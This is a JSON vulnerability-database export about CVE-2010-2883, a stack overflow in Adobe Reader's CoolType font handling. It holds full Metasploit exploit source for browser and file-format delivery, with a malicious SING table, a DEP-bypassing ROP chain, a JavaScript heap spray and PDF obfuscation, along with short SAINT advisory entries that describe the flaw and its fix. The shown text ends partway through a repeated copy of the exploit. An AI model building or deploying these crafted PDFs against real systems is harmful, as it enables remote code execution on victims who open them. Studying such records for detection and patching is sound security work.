xmlns=\"http://www.xfa.org/schema/xfa-template/2.6/\">\n<subform name=\"form1\" layout=\"tb\" locale=\"en_US\">\n<pageSet></pageSet>\n</subform></template></xdp:xdp>\nEOF\n\n xref << pdf.length\n pdf << io_def(14) << n_obfu(\"<</Length %s>>\" % xfa.length) << eol\n pdf << \"stream\" << eol\n pdf << xfa << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n ###\n # end form stuff for icucnv36.dll\n ###\n\n\n # trailing stuff\n xrefPosition = pdf.length\n pdf << \"xref\" << eol\n pdf << \"0 %d\" % (xref.length + 1) << eol\n pdf << \"0000000000 65535 f\" << eol\n xref.each do |index|\n pdf << \"%010d 00000 n\" % index << eol\n end\n\n pdf << \"trailer\" << eol\n pdf << n_obfu(\"<</Size %d/Root \" % (xref.length + 1)) << io_ref(1) << \">>\" << eol\n\n pdf << \"startxref\" << eol\n pdf << xrefPosition.to_s() << eol\n\n pdf << \"%%EOF\" << eol\n pdf\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/adobe_cooltype_sing.rb"}, {"lastseen": "2020-06-27T20:11:24", "description": "This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are assumed to be vulnerable as well.\n", "published": "2010-09-09T23:23:40", "type": "metasploit", "title": "Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2883"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_COOLTYPE_SING", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow',\n 'Description' => %q{\n This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table\n handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are\n assumed to be vulnerable as well.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # 0day found in the wild\n 'sn0wfl0w', # initial analysis, also @vicheck on twitter\n 'jduck' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2010-2883' ],\n [ 'OSVDB', '67849'],\n [ 'URL', 'http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html' ],\n [ 'URL', 'http://www.adobe.com/support/security/advisories/apsa10-02.html' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'HTTP::compression' => 'gzip',\n 'HTTP::chunked' => true,\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Tested OK via Adobe Reader 9.3.4 on Windows XP SP3 -jjd\n # Tested OK via Adobe Reader 9.3.4 on Windows 7 -jjd\n # Tested OK via Adobe Reader 9.3 on XP and 7 -todb\n [ 'Automatic', { }],\n ],\n 'DisclosureDate' => 'Sep 07 2010',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n # NOTE: The 0day used Vera.ttf (785d2fd45984c6548763ae6702d83e20)\n path = File.join( Msf::Config.data_directory, \"exploits\", \"cve-2010-2883.ttf\" )\n fd = File.open( path, \"rb\" )\n @ttf_data = fd.read(fd.stat.size)\n fd.close\n\n super\n end\n\n\n def on_request_uri(cli, request)\n print_user_agent(cli, request)\n\n print_status(\"Sending crafted PDF\")\n\n ttf_data = make_ttf()\n\n js_data = make_js(regenerate_payload(cli).encoded)\n\n # Create the pdf\n pdf = make_pdf(ttf_data, js_data)\n\n send_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })\n\n # Handle the payload\n handler(cli)\n end\n\n def print_user_agent(cli, req)\n return unless cli && cli.peerhost\n return unless req && req.headers\n return unless ua = req.headers[\"User-Agent\"]\n print_status \"Request from browser: #{ua}\"\n end\n\n def make_ttf\n\n # load the static ttf file\n ttf_data = @ttf_data.dup\n\n # Build the SING table\n sing = ''\n sing << [\n 0, 1, # tableVersionMajor, tableVersionMinor (0.1)\n 0xe01, # glyphletVersion\n 0x100, # embeddingInfo\n 0, # mainGID\n 0, # unitsPerEm\n 0, # vertAdvance\n 0x3a00 # vertOrigin\n ].pack('vvvvvvvv')\n # uniqueName\n # \"The uniqueName string must be a string of at most 27 7-bit ASCII characters\"\n #sing << \"A\" * (0x254 - sing.length)\n sing << rand_text(0x254 - sing.length)\n\n # 0xffffffff gets written here @ 0x7001400 (in BIB.dll)\n sing[0x140, 4] = [0x4a8a08e2 - 0x1c].pack('V')\n\n # This becomes our new EIP (puts esp to stack buffer)\n ret = 0x4a80cb38 # add ebp, 0x794 / leave / ret\n sing[0x208, 4] = [ret].pack('V')\n\n # This becomes the new eip after the first return\n ret = 0x4a82a714\n sing[0x18, 4] = [ret].pack('V')\n\n # This becomes the new esp after the first return\n esp = 0x0c0c0c0c\n sing[0x1c, 4] = [esp].pack('V')\n\n # Without the following, sub_801ba57 returns 0.\n sing[0x24c, 4] = [0x6c].pack('V')\n\n ttf_data[0xec, 4] = \"SING\"\n ttf_data[0x11c, sing.length] = sing\n\n ttf_data\n end\n\n def make_js(encoded_payload)\n\n # The following executes a ret2lib using icucnv36.dll\n # The effect is to bypass DEP and execute the shellcode in an indirect way\n stack_data = [\n 0x41414141, # unused\n 0x4a8063a5, # pop ecx / ret\n 0x4a8a0000, # becomes ecx\n\n 0x4a802196, # mov [ecx],eax / ret # save whatever eax starts as\n\n 0x4a801f90, # pop eax / ret\n 0x4a84903c, # becomes eax (import for CreateFileA)\n\n # -- call CreateFileA\n 0x4a80b692, # jmp [eax]\n\n 0x4a801064, # ret\n\n 0x4a8522c8, # first arg to CreateFileA (lpFileName / pointer to \"iso88591\")\n 0x10000000, # second arg - dwDesiredAccess\n 0x00000000, # third arg - dwShareMode\n 0x00000000, # fourth arg - lpSecurityAttributes\n 0x00000002, # fifth arg - dwCreationDisposition\n 0x00000102, # sixth arg - dwFlagsAndAttributes\n 0x00000000, # seventh arg - hTemplateFile\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x00000008, # becomes ebx - offset to modify\n\n #\n # This points at a neat-o block of code that ... TBD\n #\n # and [esp+ebx*2],edi\n # jne check_slash\n # ret_one:\n # mov al,1\n # ret\n # check_slash:\n # cmp al,0x2f\n # je ret_one\n # cmp al,0x41\n # jl check_lower\n # cmp al,0x5a\n # jle check_ptr\n # check_lower:\n # cmp al,0x61\n # jl ret_zero\n # cmp al,0x7a\n # jg ret_zero\n # cmp [ecx+1],0x3a\n # je ret_one\n # ret_zero:\n # xor al,al\n # ret\n #\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a801f90, # pop eax / ret\n 0x4a849038, # becomes eax (import for CreateFileMappingA)\n\n # -- call CreateFileMappingA\n 0x4a80b692, # jmp [eax]\n\n 0x4a801064, # ret\n\n 0xffffffff, # arguments to CreateFileMappingA, hFile\n 0x00000000, # lpAttributes\n 0x00000040, # flProtect\n 0x00000000, # dwMaximumSizeHigh\n 0x00010000, # dwMaximumSizeLow\n 0x00000000, # lpName\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x00000008, # becomes ebx - offset to modify\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a801f90, # pop eax / ret\n 0x4a849030, # becomes eax (import for MapViewOfFile\n\n # -- call MapViewOfFile\n 0x4a80b692, # jmp [eax]\n\n 0x4a801064, # ret\n\n 0xffffffff, # args to MapViewOfFile - hFileMappingObject\n 0x00000022, # dwDesiredAccess\n 0x00000000, # dwFileOffsetHigh\n 0x00000000, # dwFileOffsetLow\n 0x00010000, # dwNumberOfBytesToMap\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a8a0004, # becomes ecx - writable pointer\n\n 0x4a802196, # mov [ecx],eax / ret - save map base addr\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx - ptr to ret\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x00000030, # becomes ebx - offset to modify\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a801f90, # pop eax / ret\n 0x4a8a0004, # becomes eax - saved file mapping ptr\n\n 0x4a80a7d8, # mov eax,[eax] / ret - load saved mapping ptr\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx - ptr to ret\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x00000020, # becomes ebx - offset to modify\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx - ptr to ret\n\n 0x4a80aedc, # lea edx,[esp+0xc] / push edx / push eax / push [esp+0xc] / push [0x4a8a093c] / call ecx / add esp, 0x10 / ret\n\n 0x4a801f90, # pop eax / ret\n 0x00000034, # becomes eax\n\n 0x4a80d585, # add eax,edx / ret\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx - ptr to ret\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x0000000a, # becomes ebx - offset to modify\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a801f90, # pop eax / ret\n 0x4a849170, # becomes eax (import for memcpy)\n\n # -- call memcpy\n 0x4a80b692, # jmp [eax]\n\n 0xffffffff, # this stuff gets overwritten by the block at 0x4a80aedc, becomes ret from memcpy\n 0xffffffff, # becomes first arg to memcpy (dst)\n 0xffffffff, # becomes second arg to memcpy (src)\n 0x00001000, # becomes third arg to memcpy (length)\n #0x0000258b, # ??\n #0x4d4d4a8a, # ??\n ].pack('V*')\n\n var_unescape = rand_text_alpha(rand(100) + 1)\n var_shellcode = rand_text_alpha(rand(100) + 1)\n\n var_start = rand_text_alpha(rand(100) + 1)\n\n var_s = 0x10000\n var_c = rand_text_alpha(rand(100) + 1)\n var_b = rand_text_alpha(rand(100) + 1)\n var_d = rand_text_alpha(rand(100) + 1)\n var_3 = rand_text_alpha(rand(100) + 1)\n var_i = rand_text_alpha(rand(100) + 1)\n var_4 = rand_text_alpha(rand(100) + 1)\n\n payload_buf = ''\n payload_buf << stack_data\n payload_buf << encoded_payload\n\n escaped_payload = Rex::Text.to_unescape(payload_buf)\n\n js = %Q|\nvar #{var_unescape} = unescape;\nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );\nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" );\nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};\n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);\n#{var_b} += #{var_shellcode};\n#{var_b} += #{var_c};\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d};\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);\nvar #{var_4} = new Array();\nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\";\n|\n\n js\n end\n\n def random_non_ascii_string(count)\n result = \"\"\n count.times do\n result << (rand(128) + 128).chr\n end\n result\n end\n\n def io_def(id)\n \"%d 0 obj \\n\" % id\n end\n\n def io_ref(id)\n \"%d 0 R\" % id\n end\n\n\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\n def n_obfu(str)\n #return str\n result = \"\"\n str.scan(/./u) do |c|\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\n result << \"#%x\" % c.unpack(\"C*\")[0]\n else\n result << c\n end\n end\n result\n end\n\n\n def ascii_hex_whitespace_encode(str)\n result = \"\"\n whitespace = \"\"\n str.each_byte do |b|\n result << whitespace << \"%02x\" % b\n whitespace = \" \" * (rand(3) + 1)\n end\n result << \">\"\n end\n\n\n def make_pdf(ttf, js)\n\n #swf_name = rand_text_alpha(8 + rand(8)) + \".swf\"\n\n xref = []\n eol = \"\\n\"\n endobj = \"endobj\" << eol\n\n # Randomize PDF version?\n pdf = \"%PDF-1.5\" << eol\n pdf << \"%\" << random_non_ascii_string(4) << eol\n\n # catalog\n xref << pdf.length\n pdf << io_def(1) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Pages \") << io_ref(2) << eol\n pdf << n_obfu(\"/Type /Catalog\") << eol\n pdf << n_obfu(\"/OpenAction \") << io_ref(11) << eol\n # The AcroForm is required to get icucnv36.dll to load\n pdf << n_obfu(\"/AcroForm \") << io_ref(13) << eol\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # pages array\n xref << pdf.length\n pdf << io_def(2) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/MediaBox \") << io_ref(3) << eol\n pdf << n_obfu(\"/Resources \") << io_ref(4) << eol\n pdf << n_obfu(\"/Kids [\") << io_ref(5) << \"]\" << eol\n pdf << n_obfu(\"/Count 1\") << eol\n pdf << n_obfu(\"/Type /Pages\") << eol\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # media box\n xref << pdf.length\n pdf << io_def(3)\n pdf << \"[0 0 595 842]\" << eol\n pdf << endobj\n\n # resources\n xref << pdf.length\n pdf << io_def(4)\n pdf << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Font \") << io_ref(6) << eol\n pdf << \">>\" << eol\n pdf << endobj\n\n # page 1\n xref << pdf.length\n pdf << io_def(5) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Parent \") << io_ref(2) << eol\n pdf << n_obfu(\"/MediaBox \") << io_ref(3) << eol\n pdf << n_obfu(\"/Resources \") << io_ref(4) << eol\n pdf << n_obfu(\"/Contents [\") << io_ref(8) << n_obfu(\"]\") << eol\n pdf << n_obfu(\"/Type /Page\") << eol\n pdf << n_obfu(\">>\") << eol # end obj dict\n pdf << endobj\n\n # font\n xref << pdf.length\n pdf << io_def(6) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/F1 \") << io_ref(7) << eol\n pdf << \">>\" << eol\n pdf << endobj\n\n # ttf object\n xref << pdf.length\n pdf << io_def(7) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Type /Font\") << eol\n pdf << n_obfu(\"/Subtype /TrueType\") << eol\n pdf << n_obfu(\"/Name /F1\") << eol\n pdf << n_obfu(\"/BaseFont /Cinema\") << eol\n pdf << n_obfu(\"/Widths []\") << eol\n pdf << n_obfu(\"/FontDescriptor \") << io_ref(9)\n pdf << n_obfu(\"/Encoding /MacRomanEncoding\")\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # page content\n content = \"Hello World!\"\n content = \"\" +\n \"0 g\" + eol +\n \"BT\" + eol +\n \"/F1 32 Tf\" + eol +\n \"32 Tc\" + eol +\n \"1 0 0 1 32 773.872 Tm\" + eol +\n \"(\" + content + \") Tj\" + eol +\n \"ET\"\n\n xref << pdf.length\n pdf << io_def(8) << \"<<\" << eol\n pdf << n_obfu(\"/Length %s\" % content.length) << eol\n pdf << \">>\" << eol\n pdf << \"stream\" << eol\n pdf << content << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n # font descriptor\n xref << pdf.length\n pdf << io_def(9) << n_obfu(\"<<\")\n pdf << n_obfu(\"/Type/FontDescriptor/FontName/Cinema\")\n pdf << n_obfu(\"/Flags %d\" % (2**2 + 2**6 + 2**17))\n pdf << n_obfu(\"/FontBBox [-177 -269 1123 866]\")\n pdf << n_obfu(\"/FontFile2 \") << io_ref(10)\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # ttf stream\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ttf)\n pdf << io_def(10) << n_obfu(\"<</Length %s/Filter/FlateDecode/Length1 %s>>\" % [compressed.length, ttf.length]) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n # js action\n xref << pdf.length\n pdf << io_def(11) << n_obfu(\"<<\")\n pdf << n_obfu(\"/Type/Action/S/JavaScript/JS \") + io_ref(12)\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # js stream\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))\n pdf << io_def(12) << n_obfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n ###\n # The following form related data is required to get icucnv36.dll to load\n ###\n\n # form object\n xref << pdf.length\n pdf << io_def(13)\n pdf << n_obfu(\"<</XFA \") << io_ref(14) << n_obfu(\">>\") << eol\n pdf << endobj\n\n # form stream\n xfa = <<-EOF\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\">\n<config xmlns=\"http://www.xfa.org/schema/xci/2.6/\">\n<present><pdf><interactive>1</interactive></pdf></present>\n</config>\n<template xmlns=\"http://www.xfa.org/schema/xfa-template/2.6/\">\n<subform name=\"form1\" layout=\"tb\" locale=\"en_US\">\n<pageSet></pageSet>\n</subform></template></xdp:xdp>\nEOF\n\n xref << pdf.length\n pdf << io_def(14) << n_obfu(\"<</Length %s>>\" % xfa.length) << eol\n pdf << \"stream\" << eol\n pdf << xfa << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n ###\n # end form stuff for icucnv36.dll\n ###\n\n\n # trailing stuff\n xrefPosition = pdf.length\n pdf << \"xref\" << eol\n pdf << \"0 %d\" % (xref.length + 1) << eol\n pdf << \"0000000000 65535 f\" << eol\n xref.each do |index|\n pdf << \"%010d 00000 n\" % index << eol\n end\n\n pdf << \"trailer\" << eol\n pdf << n_obfu(\"<</Size %d/Root \" % (xref.length + 1)) << io_ref(1) << \">>\" << eol\n\n pdf << \"startxref\" << eol\n pdf << xrefPosition.to_s() << eol\n\n pdf << \"%%EOF\" << eol\n pdf\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/adobe_cooltype_sing.rb"}], "saint": [{"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2883"], "description": "Added: 09/17/2010 \nCVE: [CVE-2010-2883](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2883>) \nBID: [43057](<http://www.securityfocus.com/bid/43057>) \nOSVDB: [67849](<http://www.osvdb.org/67849>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA buffer overflow in the CoolType.dll module allows command execution when a user opens a PDF document containing a long, specially crafted field in a SING table within a TrueType font. \n\n### Resolution\n\nApply the fix referenced in [APSA10-02](<http://www.adobe.com/support/security/advisories/apsa10-02.html>) when available. \n\n### References\n\n<http://secunia.com/advisories/41340> \n\n\n### Limitations\n\nExploit works on Adobe Reader 9.3.4 and requires a user to open the exploit file. \n\nThe IO::Uncompress and Compress::Zlib PERL modules must be installed on the SAINTexploit host in order to run this exploit. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2010-09-17T00:00:00", "published": "2010-09-17T00:00:00", "id": "SAINT:863FBE57AF40D9EA045132B4DB784042", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_cooltype", "type": "saint", "title": "Adobe Reader CoolType.dll buffer overflow", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:35", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2883"], "description": "Added: 09/17/2010 \nCVE: [CVE-2010-2883](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2883>) \nBID: [43057](<http://www.securityfocus.com/bid/43057>) \nOSVDB: [67849](<http://www.osvdb.org/67849>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA buffer overflow in the CoolType.dll module allows command execution when a user opens a PDF document containing a long, specially crafted field in a SING table within a TrueType font. \n\n### Resolution\n\nApply the fix referenced in [APSA10-02](<http://www.adobe.com/support/security/advisories/apsa10-02.html>) when available. \n\n### References\n\n<http://secunia.com/advisories/41340> \n\n\n### Limitations\n\nExploit works on Adobe Reader 9.3.4 and requires a user to open the exploit file. \n\nThe IO::Uncompress and Compress::Zlib PERL modules must be installed on the SAINTexploit host in order to run this exploit. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2010-09-17T00:00:00", "published": "2010-09-17T00:00:00", "id": "SAINT:87E25D27930DA4EC4B02D093DE63B91E", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_cooltype", "title": "Adobe Reader CoolType.dll buffer overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2883"], "edition": 2, "description": "Added: 09/17/2010 \nCVE: [CVE-2010-2883](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2883>) \nBID: [43057](<http://www.securityfocus.com/bid/43057>) \nOSVDB: [67849](<http://www.osvdb.org/67849>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA buffer overflow in the CoolType.dll module allows command execution when a user opens a PDF document containing a long, specially crafted field in a SING table within a TrueType font. \n\n### Resolution\n\nApply the fix referenced in [APSA10-02](<http://www.adobe.com/support/security/advisories/apsa10-02.html>) when available. \n\n### References\n\n<http://secunia.com/advisories/41340> \n\n\n### Limitations\n\nExploit works on Adobe Reader 9.3.4 and requires a user to open the exploit file. \n\nThe IO::Uncompress and Compress::Zlib PERL modules must be installed on the SAINTexploit host in order to run this exploit. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2010-09-17T00:00:00", "published": "2010-09-17T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_cooltype", "id": "SAINT:EC00E4B8FCE4E77FD95A52F596033503", "type": "saint", "title": "Adobe Reader CoolType.dll buffer overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T06:05:59", "description": "Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow. CVE-2010-2883. Local exploit for windows platform", "published": "2010-09-25T00:00:00", "type": "exploitdb", "title": "Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2883"], "modified": "2010-09-25T00:00:00", "id": "EDB-ID:16619", "href": "https://www.exploit-db.com/exploits/16619/", "sourceData": "##\r\n# $Id: adobe_cooltype_sing.rb 10477 2010-09-25 11:59:02Z mc $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the Smart INdependent Glyplets (SING) table\r\n\t\t\t\thandling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior version are\r\n\t\t\t\tassumed to be vulnerable as well.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Unknown', # 0day found in the wild\r\n\t\t\t\t\t'@sn0wfl0w', # initial analysis\r\n\t\t\t\t\t'@vicheck', # initial analysis\r\n\t\t\t\t\t'jduck' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10477 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2010-2883' ],\r\n\t\t\t\t\t[ 'OSVDB', '67849'],\r\n\t\t\t\t\t[ 'URL', 'http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.adobe.com/support/security/advisories/apsa10-02.html' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f',\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.3.4 on Windows XP SP3 -jjd\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.3.4 on Windows 7 -jjd\r\n\t\t\t\t\t[ 'Automatic', { }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Sep 07 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tttf_data = make_ttf()\r\n\r\n\t\tjs_data = make_js(payload.encoded)\r\n\r\n\t\t# Create the pdf\r\n\t\tpdf = make_pdf(ttf_data, js_data)\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file...\")\r\n\r\n\t\tfile_create(pdf)\r\n\tend\r\n\r\n\tdef make_ttf\r\n\t\tttf_data = \"\"\r\n\r\n\t\t# load the static ttf file\r\n\r\n\t\t# NOTE: The 0day used Vera.ttf (785d2fd45984c6548763ae6702d83e20)\r\n\t\tpath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"cve-2010-2883.ttf\" )\r\n\t\tfd = File.open( path, \"rb\" )\r\n\t\tttf_data = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\r\n\t\t# Build the SING table\r\n\t\tsing = ''\r\n\t\tsing << [\r\n\t\t\t0, 1, # tableVersionMajor, tableVersionMinor (0.1)\r\n\t\t\t0xe01, # glyphletVersion\r\n\t\t\t0x100, # embeddingInfo\r\n\t\t\t0, # mainGID\r\n\t\t\t0, # unitsPerEm\r\n\t\t\t0, # vertAdvance\r\n\t\t\t0x3a00 # vertOrigin\r\n\t\t].pack('vvvvvvvv')\r\n\t\t# uniqueName\r\n\t\t# \"The uniqueName string must be a string of at most 27 7-bit ASCII characters\"\r\n\t\t#sing << \"A\" * (0x254 - sing.length)\r\n\t\tsing << rand_text(0x254 - sing.length)\r\n\r\n\t\t# 0xffffffff gets written here @ 0x7001400 (in BIB.dll)\r\n\t\tsing[0x140, 4] = [0x4a8a08e2 - 0x1c].pack('V')\r\n\r\n\t\t# This becomes our new EIP (puts esp to stack buffer)\r\n\t\tret = 0x4a80cb38 # add ebp, 0x794 / leave / ret\r\n\t\tsing[0x208, 4] = [ret].pack('V')\r\n\r\n\t\t# This becomes the new eip after the first return\r\n\t\tret = 0x4a82a714\r\n\t\tsing[0x18, 4] = [ret].pack('V')\r\n\r\n\t\t# This becomes the new esp after the first return\r\n\t\tesp = 0x0c0c0c0c\r\n\t\tsing[0x1c, 4] = [esp].pack('V')\r\n\r\n\t\t# Without the following, sub_801ba57 returns 0.\r\n\t\tsing[0x24c, 4] = [0x6c].pack('V')\r\n\r\n\t\tttf_data[0xec, 4] = \"SING\"\r\n\t\tttf_data[0x11c, sing.length] = sing\r\n\r\n\t\tttf_data\r\n\tend\r\n\r\n\tdef make_js(encoded_payload)\r\n\r\n\t\t# The following executes a ret2lib using icucnv36.dll\r\n\t\t# The effect is to bypass DEP and execute the shellcode in an indirect way\r\n\t\tstack_data = [\r\n\t\t\t0x41414141, # unused\r\n\t\t\t0x4a8063a5, # pop ecx / ret\r\n\t\t\t0x4a8a0000, # becomes ecx\r\n\r\n\t\t\t0x4a802196, # mov [ecx],eax / ret # save whatever eax starts 